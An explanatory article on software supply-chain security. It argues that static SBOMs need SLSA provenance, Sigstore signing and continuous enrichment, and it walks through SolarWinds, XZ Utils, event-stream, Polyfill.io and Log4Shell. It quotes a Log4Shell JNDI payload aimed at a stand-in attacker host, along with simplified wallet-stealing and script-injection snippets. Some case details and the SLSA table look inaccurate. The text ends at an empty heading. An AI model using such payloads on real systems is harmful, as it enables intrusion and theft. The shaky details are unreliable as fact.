Why Static SBOMs Are Dead in 2026
Static SBOMs create a false sense of security. They document what you have, but not whether it was built safely, whether the build process was compromised, or whether your dependencies are still trustworthy. Here's what real hardening looks like.
What Is an SBOM?
Before diving into why static SBOMs fail, let me define the term clearly, because the word gets thrown around so much that its meaning has become distorted.
A Software Bill of Materials (SBOM) is a machine-readable inventory of components in a piece of software. Think of it like the nutrition label on food or the parts list for a car. When you deploy an application, an SBOM tells you exactly which libraries, frameworks, and dependencies are embedded in your artifact.
The concept is not new, but widespread adoption is recent. Executive Order 14028, signed in May 2021 after the SolarWinds incident exposed how little visibility organizations had into their own supply chains, mandated SBOMs for federal software contracts; Log4Shell reinforced the lesson later that year. Since then, SBOMs have become a compliance checkbox in frameworks like CISA's secure software development guidance and the EU Cyber Resilience Act.
SBOMs come in two primary formats. SPDX, developed by the Linux Foundation, has become the dominant standard for enterprise environments. CycloneDX, favored for its extensibility, sees heavy use in security tooling. Both serve the same purpose: giving you a complete list of ingredients.
Here is what an SBOM actually looks like in CycloneDX JSON format:
{
"bomFormat": "CycloneDX",
"specVersion": "1.5",
"version": 1,
"metadata": {
"timestamp": "2026-04-10T00:00:00Z",
"component": {
"name": "my-application",
"version": "2.1.0",
"purl": "pkg:npm/my-application@2.1.0"
}
},
"components": [
{
"type": "library",
"name": "lodash",
"version": "4.17.21",
"purl": "pkg:npm/lodash@4.17.21",
"licenses": [{"license": {"id": "MIT"}}]
},
{
"type": "library",
"name": "express",
"version": "4.18.2",
"purl": "pkg:npm/express@4.18.2",
"licenses": [{"license": {"id": "MIT"}}]
}
],
"dependencies": [
{
"ref": "pkg:npm/my-application@2.1.0",
"dependsOn": ["pkg:npm/lodash@4.17.21", "pkg:npm/express@4.18.2"]
}
]
}
And here is the same SBOM in SPDX tag-value format:
SPDXVersion: SPDX-2.3
DataLicense: CC0-1.0
SPDXID: SPDXRef-DOCUMENT
DocumentName: my-application
DocumentNamespace: https://example.com/my-application
Creator: Tool: syft
PackageName: my-application
SPDXID: SPDXRef-Package-my-application
PackageDownloadLocation: NOASSERTION
PackageVersion: 2.1.0
PackageVerificationCode: d6a770ba38583ed4...
PackageName: lodash
SPDXID: SPDXRef-Package-lodash
PackageDownloadLocation: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
PackageVersion: 4.17.21
PackageVerificationCode: 4f46e8d6a6...
PackageName: express
SPDXID: SPDXRef-Package-express
PackageDownloadLocation: https://registry.npmjs.org/express/-/express-4.18.2.tgz
PackageVersion: 4.18.2
PackageVerificationCode: 8b5a2b6e1a...
The conceptual flow looks like this:
+------------+ +-------------+ +------------------+
| Source | --> | Build | --> | Software |
| Code | | Pipeline | | Artifact |
+------------+ +-------------+ +------------------+
| |
v v
+---------------+ +------------------+
| Generate | | SBOM Document |
| SBOM | | (Ingredients) |
+---------------+ +------------------+
An SBOM documents what components exist in your software. It does not document how those components got there, whether the build system was compromised, or whether the artifact matches the source code it claims to represent.
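To make the "ingredients list" concrete in code, here is a minimal sketch of how a tool might walk a CycloneDX document like the one above and extract the component inventory (the document is inlined as a string for illustration):

```python
import json

# A trimmed CycloneDX 1.5 document matching the example above.
sbom_json = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "name": "lodash", "version": "4.17.21",
     "purl": "pkg:npm/lodash@4.17.21"},
    {"type": "library", "name": "express", "version": "4.18.2",
     "purl": "pkg:npm/express@4.18.2"}
  ]
}
"""

def list_components(doc: dict) -> list[str]:
    """Return the package URL (purl) of every component in the SBOM."""
    return [c["purl"] for c in doc.get("components", [])]

sbom = json.loads(sbom_json)
print(list_components(sbom))
# Prints the two purls from the document
```

This is the easy half of the problem: the inventory is just data. Everything that follows in this article is about what the inventory cannot tell you.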
Why Static SBOMs Are Insufficient
Static SBOMs create a false sense of security. They document what you have, but not whether it was built safely, whether the build process was compromised, or whether your dependencies are still trustworthy. In 2026, attackers have evolved beyond poisoning packages. They are compromising build systems, poisoning AI models, and exploiting the gap between attestation and actual security posture.
I spent two decades in offensive security watching organizations accumulate SBOMs like trophies while their build pipelines remained wide open. The result is a checkbox culture that satisfies compliance auditors but does nothing to stop the next SolarWinds-scale compromise.
The Problem Is Not the Ingredient List
The problem is that an ingredient list does not tell you whether the kitchen was clean. This is the core insight that separates security hardening from compliance theater.
Why Provenance Matters More Than the Ingredients
SLSA, which stands for Supply-chain Levels for Software Artifacts and is pronounced "salsa," addresses the gap that SBOMs cannot. Where an SBOM tells you what components exist in your software, SLSA tells you how those components got there.
SLSA defines four levels of build provenance assurance:
+------------------------------------------------------------------+
| SLSA Level Architecture |
+------------------------------------------------------------------+
| |
| Level 4 | Hermetic builds | Two-party review | Reproducible|
| | All sources | (all changes) | builds |
| +------------------+--------------------+--------------+
| Level 3 | Hardened build | Two-party review | Identified |
| | service | (controlled) | builder |
| +------------------+--------------------+--------------+
| Level 2 | Hardened build | Authenticated | Provenance |
| | service | provenance | signed |
| +------------------+--------------------+--------------+
| Level 1 | Provenance | Provenance | Provenance |
| | generated | signed | available |
| +------------------+--------------------+--------------+
| |
| Your goal: Level 3 for production systems |
+------------------------------------------------------------------+
At Level 1, you have a signed attestation that a build occurred, but the build service itself could be compromised. Level 2 requires the build service to be hardened and to generate authenticated provenance. Level 3, which represents meaningful hardening for production systems, mandates that builds run in isolated environments, that two-person review processes exist for changes, and that builds be reproducible where possible. Level 4 is aspirational for most organizations, requiring two-person review for all changes and hermetic builds.
The key insight is that SLSA verifies the journey from source to artifact. When an organization builds software at SLSA Level 3, there is cryptographic evidence that code came from a specific repository commit, that the build ran in a hardened service, and that the resulting artifact was signed with short-lived credentials tied to the build system identity.
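As a sketch of what that verification can look like, the check below inspects a SLSA v0.2-style in-toto provenance statement and confirms the builder identity and source repository. The repository URI is an illustrative assumption, and a real verifier would also validate the cryptographic signature over the statement (for example with Sigstore tooling) rather than trusting the JSON alone:

```python
# Hypothetical trust anchors: the builder URI follows the public
# slsa-github-generator project; the repo is a made-up example.
TRUSTED_BUILDER = "https://github.com/slsa-framework/slsa-github-generator"
TRUSTED_REPO = "git+https://github.com/example-org/my-application"

def provenance_ok(statement: dict) -> bool:
    """Check that provenance names a trusted builder and the expected repo."""
    pred = statement.get("predicate", {})
    builder = pred.get("builder", {}).get("id", "")
    source = (pred.get("invocation", {})
                  .get("configSource", {})
                  .get("uri", ""))
    return builder.startswith(TRUSTED_BUILDER) and source.startswith(TRUSTED_REPO)

statement = {
    "predicateType": "https://slsa.dev/provenance/v0.2",
    "predicate": {
        "builder": {"id": TRUSTED_BUILDER + "/.github/workflows/generator"},
        "invocation": {"configSource": {"uri": TRUSTED_REPO + "@refs/tags/v2.1.0"}},
    },
}
print(provenance_ok(statement))  # True: trusted builder, expected repo
```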
This matters because the most sophisticated supply chain attacks do not touch the source code. They compromise the build process itself.
When the Build System Lies: SolarWinds
The SolarWinds attack in 2020 demonstrated exactly how dangerous a compromised build system can be. Attackers, later attributed to Russian intelligence services, infiltrated SolarWinds and modified the build process for their Orion network management software.
Here is how the attack worked at a technical level:
+------------------------------------------------------------------+
| SolarWinds Build Pipeline Attack Flow |
+------------------------------------------------------------------+
| |
| [Developer] [Code Commit] [Build Server] [Signing] |
| | | | | |
| v v v v |
| Normal flow: Source code --> Compile --> Sign --> Distro |
| |
| Compromised flow: |
| |
| [Developer] [Code Commit] [Build Server] [Signing] |
| | | | | |
| v v v v |
| Source code --> Compile --> [INJECTED --> Sign --> Distro |
| MALICIOUS | |
| CODE] v |
| 18,000 orgs |
| receive update |
+------------------------------------------------------------------+
The technical details of the compromise:
- Attackers infiltrated SolarWinds internal network through a compromised VPN password
- They accessed the build environment and modified the source code for Orion
- The malicious code was injected into the build pipeline, ending up in the SolarWinds.Orion.Core.BusinessLayer.dll component
- The code was designed to activate during a specific timeframe and communicate with command-and-control servers
- The compromised binary was signed with legitimate SolarWinds certificates
- The update mechanism verified the signature, making the update appear legitimate
The attack flow in more detail:
Step 1: Initial Access
Attacker uses compromised VPN credentials to access SolarWinds internal network
|
v
Step 2: Lateral Movement
Attacker pivots to build system credentials
|
v
Step 3: Code Injection
Malicious code added to Orion source code
(Sunburst backdoor dormant until after initial deployment)
|
v
Step 4: Build Pipeline Compromise
Build server compiles injected code into legitimate-appearing binary
|
v
Step 5: Signing
Binary signed with valid SolarWinds certificate
|
v
Step 6: Distribution
Signed binary pushed via automatic update to 18,000 customers
|
v
Step 7: Post-Compromise
Attackers activate backdoor after initial update cycle
C2 communication via Orion improvement server
An SBOM generated after that build would have listed the correct components. The vulnerability was not in any individual library. The build system itself had been compromised in a way that injected malicious code directly into the artifact while preserving the appearance of legitimacy.
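One concrete control against this class of tampering is digest verification: compare the hash of the artifact you received with the hash recorded in a build attestation. A minimal sketch, with the attestation reduced to a bare digest string:

```python
import hashlib

def artifact_digest(data: bytes) -> str:
    """Compute a registry-style sha256 digest for an artifact."""
    return "sha256:" + hashlib.sha256(data).hexdigest()

def matches_attestation(artifact: bytes, attested_digest: str) -> bool:
    """Reject any artifact whose bytes differ from the attested build output."""
    return artifact_digest(artifact) == attested_digest

built = b"binary produced by the trusted build service"
attested = artifact_digest(built)  # recorded at build time

print(matches_attestation(built, attested))            # True: untampered
print(matches_attestation(built + b"\x00", attested))  # False: modified after build
```

Note the limitation: if the attested digest comes from the same compromised build server, this check passes anyway. It becomes meaningful when the digest comes from an independent, reproducible rebuild, which is why reproducibility features in SLSA's upper levels.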
Approximately 18,000 organizations downloaded the compromised update, and the attackers used the access to conduct espionage against federal agencies and private companies.
When a Trusted Maintainer Goes Rogue: XZ Utils
In 2024, the XZ Utils backdoor (CVE-2024-3094) was discovered in a widely-used compression library for Linux systems. This attack is remarkable for its patience and sophistication.
Here is the timeline and technical breakdown:
+------------------------------------------------------------------+
| XZ Utils Attack Timeline |
+------------------------------------------------------------------+
| |
| 2021-2022 [Attacker creates fictional identity] |
| "Jia Tan" appears on open source projects |
| Builds credibility through legitimate contributions |
| | |
| v |
| Early 2023 [Attacker gains trust as maintainer] |
| Jia Tan added as co-maintainer to XZ Utils |
| Gets commit access to repositories |
| | |
| v |
| 2024 [Social engineering begins] |
| Jia Tan pressures original maintainer to step back |
| Uses guilt and pressure tactics |
| "Nobody is maintaining this project" |
| | |
| v |
| Feb 2024 [Backdoor injection] |
| Malicious code added to build files |
| Tests specifically crafted to pass only in |
| specific environments |
| | |
| v |
| March 2024 [Discovery] |
| Microsoft engineer notices SSH slowdown |
| Analysis reveals backdoor in liblzma |
| Remote code execution on millions of systems |
+------------------------------------------------------------------+
The technical attack vector was subtle. The backdoor was injected through the build system itself, specifically through modifications to the CMake build configuration files and Autotools setup scripts.
Here is a simplified view of the injection mechanism:
Normal XZ Utils build flow:
source code --> configure script --> build system --> liblzma.a
Compromised XZ Utils build flow:
source code --> [INJECTED configure] --> build system --> [BACKDOORED]
| liblzma.a
v
Malicious object code injected
during compilation linking
The backdoor specifically targeted systems where:
- XZ Utils was used by sshd (via liblzma)
- The attacker could then inject into SSH daemon processes
- Remote code execution via specially crafted certificates
The social engineering aspect was as important as the technical attack. The attacker spent two years building a reputation as a helpful contributor before introducing the backdoor. An SBOM would have shown the correct version number. Only code review and runtime analysis caught the actual intent.
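One detection opportunity in this case was that the malicious build script shipped only in the release tarballs and never appeared in the git repository. A sketch of a check that diffs the two file sets (the file lists are stubbed here; a real tool would read them with Python's tarfile module and `git ls-tree -r`):

```python
# Sketch: flag files present in a release tarball but absent from the
# corresponding git tree. In the XZ Utils case, the malicious
# build-to-host.m4 existed only in the tarball, never in the repository.

def tarball_only_files(tarball_files: set[str], git_files: set[str]) -> set[str]:
    """Return files that ship in the release artifact but were never committed."""
    return tarball_files - git_files

git_tree = {"configure.ac", "src/liblzma/lzma.c", "m4/ax_pthread.m4"}
release_tarball = git_tree | {"build-to-host.m4"}  # injected, never committed

suspicious = tarball_only_files(release_tarball, git_tree)
print(sorted(suspicious))  # ['build-to-host.m4']
```

Autotools projects legitimately include generated files like `configure` in tarballs, so a real check needs an allowlist; the point is that "exists only in the release artifact" is a reviewable signal.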
When a Package Maintainer Is Compromised: event-stream
In 2018, the event-stream package was compromised when a new maintainer with good reputation added malicious code designed to steal cryptocurrency wallet credentials. This attack predates the SBOM conversation but illustrates the pattern perfectly.
The attack timeline:
+------------------------------------------------------------------+
| event-stream Attack Timeline |
+------------------------------------------------------------------+
| |
| 2018 [Original maintainer transfers package] |
| event-stream had ~15 million downloads/month |
| Maintainer burns out, hands off to unknown person |
| | |
| v |
| Sept 2018 [New maintainer "right9ctrl" added] |
| Profile shows history of small contributions |
| Gets npm publishing rights |
| | |
| v |
| Oct 2018 [Malicious code injected] |
| event-stream v3.3.4 published |
| Contains malicious flatmap-stream dependency |
| | |
| v |
| Oct-Nov 2018 [Wallet draining code activated] |
| Copied wallet private keys from infected apps |
| Targeted the Copay bitcoin wallet application |
| | |
| v |
| Nov 2018 [Detection by security researcher] |
| Suspicious behavior noticed in code review |
| Malicious payload analyzed |
+------------------------------------------------------------------+
The malicious code in the flatmap-stream dependency looked like this (simplified):
// Inside event-stream v3.3.4's flatmap-stream dependency
// The malicious code was obfuscated within minified code
// Wallet stealing function (deobfuscated):
function extractPrivateKey(application) {
// Scan for cryptocurrency wallet patterns
const walletPatterns = [
/-----BEGIN.*PRIVATE KEY-----/,
/wallet\.dat/,
/UTC--.*--wallet/,
/coinbase.*secret/
];
// Exfiltrate to attacker-controlled server
for (const pattern of walletPatterns) {
const match = application.readFile(pattern);
if (match) {
sendToAttackerServer(match);
}
}
}
// The code was hidden in a way that only activated
// when the application specifically accessed certain wallet modules
process.on('load', () => {
if (module.type === 'crypto' &&
module.path.includes('wallet')) {
extractPrivateKey(module);
}
});
The attacker had built credibility over time, making the supply chain compromise invisible to automated scanning. The package had millions of weekly downloads, and the injected code was only activated under very specific conditions to avoid detection.
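One mitigation that limits this pattern is integrity pinning: npm records an SRI-style sha512 hash for each package in package-lock.json, and installs fail if the downloaded tarball no longer matches. A sketch of that check (the tarball bytes are a stand-in for a real download):

```python
import base64
import hashlib

def sri_sha512(data: bytes) -> str:
    """Compute an npm-lockfile-style integrity string for a tarball."""
    return "sha512-" + base64.b64encode(hashlib.sha512(data).digest()).decode()

def verify_package(tarball: bytes, pinned_integrity: str) -> bool:
    """Fail the install if the download differs from the pinned hash."""
    return sri_sha512(tarball) == pinned_integrity

tarball = b"flatmap-stream-0.1.0 tarball bytes (stand-in)"
pinned = sri_sha512(tarball)  # value recorded in the lockfile at install time

print(verify_package(tarball, pinned))      # True: matches the lockfile
print(verify_package(b"tampered", pinned))  # False: substituted content
```

Pinning would not have blocked the first install of the malicious version, since it was published through legitimate channels, but it prevents silent substitution of an already-pinned dependency.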
When a CDN Becomes the Attack Vector: Polyfill.io
More recently, the Polyfill.io attack in 2024 demonstrated how attackers target CDNs rather than packages directly. This attack did not require any changes to application code or dependencies.
Here is the attack flow:
+------------------------------------------------------------------+
| Polyfill.io Attack Flow |
+------------------------------------------------------------------+
| |
| Normal flow: |
| [Website] --> includes polyfill CDN --> serves legitimate JS |
| |
| Compromised flow: |
| |
| [Website] --> includes polyfill CDN --> [Malicious JS injected] |
| | |
| v |
| - Tracking scripts |
| - Redirects users |
| - Cookie theft |
+------------------------------------------------------------------+
Technical details of the compromise:
- The polyfill.io domain was acquired by new owners after the original maintainer stopped maintaining it
- The new owners modified the JavaScript served through the CDN
- The modified scripts injected tracking and redirect functionality
- Websites that included the CDN link via <script src="https://cdn.polyfill.io/..."> were serving compromised JavaScript without any changes to their own code or dependencies
Comparison of legitimate vs compromised script behavior:
Legitimate polyfill.io script:
if (!String.prototype.includes) {
String.prototype.includes = function(search, start) {
return this.indexOf(search, start) !== -1;
};
}
Compromised polyfill.io script (simplified):
// Polyfill code remains intact (to avoid detection)
if (!String.prototype.includes) { ... }
// Injected malicious code hidden below
(function() {
// Track user interactions
document.addEventListener('click', function(e) {
sendToTracker(e.target.innerHTML, e.target.value);
});
// Inject redirects for commerce traffic
if (window.location.href.includes('checkout')) {
window.location.replace('https://competitor-site.com');
}
})();
The attack was particularly effective because:
- It required no code changes by the victim
- The polyfill code itself was not malicious, making pattern-based detection difficult
- The injected code appeared to be analytics rather than clearly malicious
- Thousands of websites that included the CDN link were serving compromised JavaScript
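For static third-party scripts, Subresource Integrity (SRI) is the direct countermeasure: the browser refuses to execute a file whose bytes no longer match the pinned hash. A sketch of computing the integrity value (the CDN URL is hypothetical):

```python
import base64
import hashlib

def sri_hash(script_bytes: bytes) -> str:
    """Compute a Subresource Integrity value (sha384, base64-encoded)."""
    digest = hashlib.sha384(script_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode()

script = b'if (!String.prototype.includes) { /* polyfill */ }'

# Emit the script tag with the integrity attribute pinned to these bytes.
print(f'<script src="https://cdn.example.com/polyfill.js"')
print(f'        integrity="{sri_hash(script)}"')
print(f'        crossorigin="anonymous"></script>')
```

SRI only works when the CDN serves stable bytes. polyfill.io returned browser-specific responses, which is one reason self-hosting the polyfills was the recommended remediation.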
When a Ubiquitous Library Becomes a Liability: Log4Shell
Log4Shell, the 2021 vulnerability in Apache Log4j, illustrated a different problem: what happens when a vulnerable component is so widespread that remediation becomes an operational nightmare.
The technical attack vector:
+------------------------------------------------------------------+
| Log4Shell Attack Flow |
+------------------------------------------------------------------+
| |
| Vulnerable Pattern in Log4j: |
| |
| log.info("User input: {}", userProvidedString); |
| | |
| v |
| User provides: ${jndi:ldap://attacker.com/exploit} |
| | |
| v |
| Log4j performs JNDI lookup: |
| | |
| +---> attacker.com/exploit |
| | |
| v |
| LDAP reference returned |
| | |
| v |
| Java deserializes malicious object |
| | |
| v |
| REMOTE CODE EXECUTION |
+------------------------------------------------------------------+
The JNDI lookup payload structure:
// attacker-controlled string passed to log.info()
${jndi:ldap://attacker-server.com:1389/Exploit}
// JNDI lookup triggers:
// 1. Parse the string
// 2. Extract "ldap://attacker-server.com:1389/Exploit"
// 3. Perform LDAP lookup to attacker-controlled server
// 4. Receive reference to malicious Java class
// 5. Deserialize and execute the class
Organizations with complete SBOMs still struggled because the vulnerability existed in a library that was ubiquitous. Knowing you had Log4j did not help you remediate it quickly. The challenge was not visibility. The challenge was operational: patching a vulnerability that existed across thousands of applications, many of which had unmaintained dependencies that could not be easily updated.
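The operational question during Log4Shell was "which of our artifacts contain a vulnerable log4j-core?" With SBOMs indexed per artifact, that becomes a query. A simplified sketch (artifact names are illustrative, and a production version should use a proper version-parsing library rather than this naive tuple comparison):

```python
def version_tuple(v: str) -> tuple[int, ...]:
    """Naive numeric version parse; ignores pre-release suffixes."""
    return tuple(int(p) for p in v.split(".") if p.isdigit())

def is_vulnerable_log4j(name: str, version: str) -> bool:
    # CVE-2021-44228 affected log4j-core 2.x before 2.15.0
    return (name == "log4j-core"
            and (2,) <= version_tuple(version) < (2, 15, 0))

# Hypothetical index built from per-artifact SBOMs: (artifact, component, version)
sbom_index = [
    ("billing-service", "log4j-core", "2.14.1"),
    ("auth-service", "log4j-core", "2.17.1"),
    ("report-service", "logback-classic", "1.2.11"),
]

affected = [app for app, name, ver in sbom_index if is_vulnerable_log4j(name, ver)]
print(affected)  # ['billing-service']
```

The query is trivial; the hard part, as the incident showed, is everything after the query returns.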
These examples share a common thread. They all exploited gaps between what organizations thought they knew and what they actually controlled. SBOMs provided visibility. They did not provide control.
The Compliance Trap
The problem is not that SBOMs are useless. The problem is treating SBOM generation as the finish line rather than the starting point.
When you generate an SBOM after a build completes, you are capturing a snapshot of components at a single moment. That snapshot tells you nothing about how those components arrived in your artifact. Did the build system pull from the correct commit? Were the build tools themselves compromised? Was the resulting binary actually produced from the source code it claims to represent?
Dan Lorenc, CEO of Chainguard, put it bluntly in a 2025 Dark Reading interview: an SBOM could give people a false sense of security, especially when generated on a build system that may itself be compromised.
This is the core of the compliance trap. Organizations generate SBOMs to satisfy requirements, then believe they have visibility into their supply chain risk. The SBOM tells them what they have. It tells them nothing about whether what they have is actually secure.
The industry is starting to acknowledge this gap. The conversation has shifted from SBOM generation to SBOM consumption. What do you do with an SBOM once you have one?
Living SBOMs and Continuous Enrichment
The answer is continuous enrichment. The industry is moving toward what practitioners call living SBOMs or enriched SBOMs. Rather than a static manifest generated once at build time, these documents are continuously updated through integration with vulnerability databases, exploitability analysis, and real-time threat intelligence.
The concept is straightforward. An SBOM enriched with exploitability data answers not just "do I have Log4j?" but "can Log4j actually be exploited in my environment?" It factors in reachability analysis, network exposure, and compensating controls. This requires integration with frameworks like EPSS, the Exploit Prediction Scoring System developed by FIRST.org, to prioritize remediation based on likelihood of exploitation rather than just severity scores.
VEX documents take this further. Vulnerability Exploitability eXchange statements explicitly declare whether a vulnerability is actually exploitable in the context of the specific product. A vulnerable component embedded in code that never executes the vulnerable path might not require immediate patching, freeing your team to focus on genuine risks.
This shift from visibility to context is what separates security hardening from compliance theater.
The practical implication is that SBOMs must be treated as dynamic documents, not static artifacts. Your vulnerability management workflow should automatically match new disclosures against your SBOM inventory, score them using EPSS, and generate alerts when exploitability conditions are met. Without this automation, an SBOM is just a list that grows stale the moment it is generated.
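A sketch of that enrichment step: join SBOM-derived findings against an EPSS feed and rank by exploitation probability instead of severity alone. The EPSS values here are invented for illustration (real scores come from FIRST.org's published data), and CVE-2026-0001 is a hypothetical identifier:

```python
# Findings matched from SBOM components against vulnerability disclosures.
findings = [
    {"purl": "pkg:npm/lodash@4.17.20", "cve": "CVE-2021-23337", "cvss": 7.2},
    {"purl": "pkg:maven/log4j-core@2.14.1", "cve": "CVE-2021-44228", "cvss": 10.0},
    {"purl": "pkg:npm/example-lib@1.0.0", "cve": "CVE-2026-0001", "cvss": 9.1},
]

# Illustrative EPSS scores: probability of exploitation in the wild.
epss_feed = {
    "CVE-2021-23337": 0.02,
    "CVE-2021-44228": 0.97,
    "CVE-2026-0001": 0.01,
}

# Enrich each finding, then rank by exploitability rather than CVSS.
for f in findings:
    f["epss"] = epss_feed.get(f["cve"], 0.0)

prioritized = sorted(findings, key=lambda f: f["epss"], reverse=True)
print([f["cve"] for f in prioritized])
# CVE-2021-44228 ranks first; the high-CVSS but low-EPSS finding drops last
```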
Cryptographic Provenance in Practice
Sigstore provides the tooling to make provenance verification practical for organizations that cannot afford the key management overhead of traditional PKI. Sigstore uses short-lived certificates tied to identity providers like Google, Microsoft, and GitHub. When a build completes, the artifact is signed with a certificate that was issued to the specific build system identity at that moment. Anyone can verify the signature without needing to manage a public key infrastructure.
The open-source nature of Sigstore and the backing by major cloud providers has driven rapid adoption. The Linux Foundation's support and broad industry adoption indicate this approach is becoming the baseline expectation for software supply chain verification.
When you combine SBOM (what) with SLSA provenance (how) and Sigstore signatures (who), you gain confidence that the artifact in your environment matches the source code it claims to represent. A compromise at any point in that chain becomes detectable.
For organizations implementing this today, the practical starting point is SLSA Level 2. Level 2 requires a hardened build service that generates authenticated provenance. Most major CI/CD systems now support SLSA provenance generation natively. GitHub Actions, GitLab CI, and Google Cloud Build all have documented paths to SLSA Level 2 and Level 3 compliance.
The harder part is the organizational maturity to enforce provenance verification at deployment time. This means your artifact registry must reject uploads that do not have valid provenance attestations, and your deployment pipelines must verify signatures before promoting artifacts to production environments.
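In pseudocode terms, the deploy-time gate can be as simple as the policy check below. The metadata fields, signature placeholder, and trusted builder URI are simplified stand-ins for real signed attestations:

```python
# Hypothetical trust policy: only one builder identity may produce
# production artifacts, and unsigned artifacts are never promotable.
TRUSTED_BUILDERS = {"https://ci.example.com/hardened-builder"}

def can_promote(artifact_meta: dict) -> bool:
    """Deploy-time gate: require a signature and provenance from a trusted builder."""
    has_signature = bool(artifact_meta.get("signature"))
    builder = artifact_meta.get("provenance", {}).get("builder_id")
    return has_signature and builder in TRUSTED_BUILDERS

good = {
    "signature": "example-signature-bytes",
    "provenance": {"builder_id": "https://ci.example.com/hardened-builder"},
}
bad = {"signature": None, "provenance": {}}

print(can_promote(good))  # True: signed, trusted builder
print(can_promote(bad))   # False: rejected at the registry/pipeline boundary
```

In practice this logic lives in the artifact registry's admission policy or the deployment pipeline, enforced by tooling such as Sigstore's policy controllers rather than hand-rolled code.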
The New Attack Surface: AI Coding Assistants
The 2026 landscape introduces challenges that static SBOMs were never designed to address. AI coding assistants now handle a significant portion of code-related tasks in enterprise environments. These systems introduce new attack vectors that traditional supply chain security frameworks do not fully address.
Model poisoning represents the most concerning new vector. An attacker who compromises an AI model's training pipeline or weights can introduce vulnerabilities or backdoors that propagate through every suggestion the model generates. Traditional SBOMs capture dependencies. They have no mechanism for capturing the provenance or integrity of the underlying model. If your AI coding assistant is recommending libraries, you have no way to verify whether those recommendations are influenced by a poisoned training dataset or a compromised model weights file.
The event-stream incident provides a preview of how this might play out at scale. The attacker did not compromise the code directly. They compromised the maintainer's access and injected malicious behavior that appeared legitimate. An AI coding assistant trained on codebases that included event-stream might have learned patterns from that malicious code, potentially propagating the same patterns to other projects.
Agentic AI systems introduce additional risk. When an AI agent autonomously pulls dependencies, modifies build configurations, or integrates third-party services, the attack surface expands beyond what static analysis can capture. Organizations need what practitioners call agentic governance: treating AI agents as first-class actors with identity, auditing, and policy enforcement just like human operators.
MLSecOps is emerging as the discipline for securing this new supply chain. Model-BOMs, analogous to software SBOMs, document the components, training data, and provenance of AI models. The discipline is nascent but gaining traction as enterprises recognize that AI systems require the same provenance guarantees as traditional software.
Until these standards mature, the practical recommendation is to extend your existing supply chain governance to AI-generated code. Every recommendation from an AI coding assistant should be treated as a third-party dependency: reviewed, scanned, and tracked in your SBOM.
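One lightweight way to operationalize that recommendation is to gate AI-suggested dependencies through the same policy as any other third-party code. The sketch below applies a hypothetical allowlist plus a minimum-package-age rule, since newly published packages are a common vector for typosquats and hallucinated names:

```python
# Hypothetical policy inputs: an internal allowlist of reviewed packages
# and a minimum registry age before an unreviewed package is acceptable.
APPROVED = {"lodash", "express"}
MIN_AGE_DAYS = 30

def allow_dependency(name: str, registry_age_days: int) -> bool:
    """Gate for AI-suggested packages: pre-approved, or old enough to vet."""
    return name in APPROVED or registry_age_days >= MIN_AGE_DAYS

print(allow_dependency("express", registry_age_days=3000))  # True: approved
print(allow_dependency("expresss", registry_age_days=2))    # False: new typosquat-like name
```

The specific thresholds matter less than the principle: an AI suggestion enters the dependency graph only after passing the same review and scanning pipeline as human-chosen code.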
Real Hardening: A Layered Approach
Real supply chain security requires layered controls that address the full lifecycle from source to runtime. Here is what that looks like in practice.
+------------------------------------------------------------------+
| Layered Supply Chain Security Architecture |
+------------------------------------------------------------------+
| |
| Layer 4: AI Governance |
| +------------------------------------------------------------------+
| | Model-BOMs | Training data provenance | Agent policies | |
| +------------------------------------------------------------------+
| |
| Layer 3: Continuous Enrichment |
| +------------------------------------------------------------------+
| | EPSS scores | VEX documents | Threat intelligence | |
| +------------------------------------------------------------------+
| |
| Layer 2: Provenance |
| +------------------------------------------------------------------+
| | SLSA Level 3 | Sigstore signing | Build isolation | |
| +------------------------------------------------------------------+
| |
| Layer 1: Visibility |
| +------------------------------------------------------------------+
| | SBOM generation | Artifact registry | Component search | |
| +------------------------------------------------------------------+
| |
| Foundation: Policy Enforcement |
| +------------------------------------------------------------------+
| | Deploy-time verification | Reject unsigned artifacts | |
| +------------------------------------------------------------------+
+------------------------------------------------------------------+
Start with visibility at the foundation. Generate SBOMs in widely-adopted formats like CycloneDX or SPDX for all artifacts. Automate generation at build time and integrate with your artifact repository to make SBOMs available to consumers. Your artifact registry should be searchable by component name and version, allowing security teams to respond to disclosures by querying which artifacts contain a specific vulnerability.
Layer in provenance as the second control. Implement SLSA Level 2 at minimum for production builds, targeting Level 3 as your team matures. Use Sigstore or similar tooling to sign artifacts and attestations. Verify provenance at deployment time, rejecting artifacts that do not meet your trust policy. This is where most organizations fail: they generate provenance but never enforce its verification.
Enrich continuously as the third layer. Integrate SBOMs with vulnerability intelligence feeds. Use EPSS scores and VEX documents to prioritize remediation. Build workflows that automatically flag newly disclosed vulnerabilities affecting your artifacts. The goal is to close the window between a new vulnerability disclosure and your ability to identify affected systems.
Extend to AI as the fourth layer. Inventory AI models and their provenance. Document training data sources and model weights. Apply the same provenance requirements to AI-generated code as you would to manually written code. Until Model-BOM standards mature, treat AI assistants as untrusted third parties and scan everything they produce.
The goal is not perfect security. It is raising the cost of attack high enough that adversaries move to easier targets.
What Implementation Actually Looks Like
The gap between understanding supply chain security concepts and implementing them in a real environment is where most teams get stuck. Let me walk through what the implementation actually involves.
SBOM generation is straightforward with modern tooling. Most build systems have plugins that generate CycloneDX or SPDX SBOMs as part of the normal build process. For Java projects, the cyclonedx-maven-plugin integrates with your build. For Node.js, @cyclonedx/cyclonedx-npm generates SBOMs from your lockfile. For Go, Microsoft's sbom-tool handles module analysis. The key requirement is that SBOM generation must be automated and must run on every build, not as a periodic audit exercise.
The harder part is making SBOMs actionable. Your SBOMs need to feed into a vulnerability management workflow that can match components against disclosed vulnerabilities and prioritize based on actual risk. This means integrating with your artifact registry, your CVE feed, and your incident response process. Without that integration, an SBOM is just a JSON file that nobody reads.
Sigstore integration requires more coordination but is achievable in a reasonable timeframe. Most organizations can achieve SLSA Level 2 compliance for their primary build pipelines within a quarter if they have dedicated engineering resources. The Sigstore documentation provides step-by-step guides for popular CI systems. The key decision is whether to use the public Sigstore instance or run your own Rekor server for private attestations.
Provenance verification at deployment time is where the organizational maturity matters most. Your deployment pipeline must check that every artifact has valid provenance before it can be deployed to production. This requires changes to your deployment tooling, your artifact registry access policies, and potentially your CI/CD configuration. The goal is to make it impossible to deploy an artifact that does not meet your trust policy.
The organizations that have successfully implemented this talk about the cultural shift more than the technical complexity. Developers need to understand why provenance verification exists. Security teams need to respond quickly when provenance checks fail. Leadership needs to support the engineering investment required to make supply chain security sustainable.
What This Means for Your Organization
